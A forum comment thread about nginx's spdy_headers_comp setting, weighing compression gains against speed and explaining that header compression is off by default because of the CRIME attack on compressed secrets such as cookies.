[BobVerg]

"spdy_headers_comp 7;" looks like huge overkill. It provides about 10% better compression ratio than setting 1, but two times slower.

[nodesocket]

I was wondering why by default it is 0/off. Are there issues with client/browser compatibility?

[BobVerg]

It's because of CRIME vulnerability.

[nodesocket]

More information about CRIME. http://en.wikipedia.org/wiki/CRIME_(security_exploit) For now, disabling SPDY header compression is the right approach. Security > Performance.

[hobohacker]

Let's be clear that the original CRIME attack was against request header secrets. Therefore, disabling response header compression (as nginx defaults to) does not prevent that. SPDY/3.1 request header compression is a client-side choice, not server-side.

[BobVerg]

CRIME attack isn't specific to request or response. If you pass secrets in response headers, then the attack can be performed against them.

[hobohacker]

That's true, which is why I was careful to say in its original form :) Since the original attack was on cookies (request headers). To my knowledge, no other SPDY server defaults response header compression to off. But yeah, if your application does pass secrets in response headers, you should be careful.